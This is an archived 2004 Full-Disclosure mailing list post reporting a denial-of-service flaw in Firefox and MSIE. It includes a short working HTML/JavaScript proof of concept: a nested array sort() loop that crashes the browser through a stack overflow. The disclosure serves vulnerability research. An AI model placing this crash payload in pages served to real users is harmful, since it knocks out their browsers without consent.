Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception |
|---|---|
| Date: | Thu, 25 Nov 2004 02:04:44 +0100 |
Hi all,
Same flaw works for Firefox as well as MSIE:
<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>
Added to the list:
http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html
I'd have loved to CC mozilla about this, but I didn't have the time to do the
crash course "how to write a bug report" and go through all that bugzilla crap.
Cheers,
SkyLined
http://www.edup.tudelft.nl/~bjwever
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
| Previous by Date: | Re: Router ZyXEL Prestige 650 HW http remote admin., Steve Clement |
|---|---|
| Next by Date: | [SIG^2 G-TEC] CMailServer WebMail v5.2 Multiple Vulnerabilities, chewkeong |
| Previous by Thread: | STG Security Advisory: [SSA-20041122-11] JSPWiki XSS vulnerability, advisory |
| Next by Thread: | [Full-Disclosure] More Browser flaws on MACOSX: nested array sort() loop Stack overflow exception, Marco Mella |
| Indexes: | [Date] [Thread] [Top] [All Lists] |